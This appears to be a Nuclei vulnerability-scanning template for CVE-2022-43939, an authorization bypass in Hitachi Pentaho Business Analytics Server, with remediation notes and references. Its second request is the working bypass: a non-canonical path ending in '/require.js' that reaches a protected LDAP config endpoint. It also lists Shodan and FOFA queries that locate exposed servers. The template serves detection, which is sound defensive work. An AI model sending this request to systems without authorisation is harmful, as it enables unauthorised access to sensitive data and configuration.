id: CVE-2022-43939

info:
  name: Hitachi Pentaho Business Analytics Server - Bypass Authorization
  author: daffainfo
  severity: high
  description: |
    Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x contain security restrictions using non-canonical URLs which can be circumvented.
  impact: |
    Unauthenticated attackers can bypass authorization restrictions using non-canonical URL paths to access protected administrative endpoints in Hitachi Pentaho Business Analytics Server, potentially gaining unauthorized access to sensitive analytics data and configurations.
  remediation: |
    Upgrade to Hitachi Vantara Pentaho Business Analytics Server version 9.4.0.1, 9.3.0.2 or later that properly validates canonical URL paths.
  reference:
    - https://support.pentaho.com/hc/en-us/articles/14455394120333--Resolved-Pentaho-BA-Server-Use-of-Non-Canonical-URL-Paths-for-Authorization-Decisions-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43939-
    - https://nvd.nist.gov/vuln/detail/CVE-2022-43769
    - https://research.aurainfosec.io/pentest/pentah0wnage/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
    cvss-score: 8.6
    cve-id: CVE-2022-43939
    epss-score: 0.93254
    epss-percentile: 0.99813
    cwe-id: CWE-647
    cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: hitachi
    product: vantara_pentaho_business_analytics_server
    shodan-query: http.favicon.hash:1749354953
    fofa-query: icon_hash=1749354953
  tags: cve,cve2022,pentaho,hitachi,auth-bypass,vkev,kev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/pentaho/Login'

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Pentaho User Console - Login")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Path=/pentaho'
          - 'application/json'
        condition: and

      - type: word
        part: body
        words:
          - '{}'

      - type: status
        status:
          - 200
# digest: 490a0046304402200e2126fb0932ef38f8e83afe2c050edac7f43cd5833cb6ac2f139a40dd0e28f30220280734a5aabdea4f5aec3e9cd8586fb4a4f94605c452c436e16d783ba51c9353:922c64590222798bb761d5b6d8e72950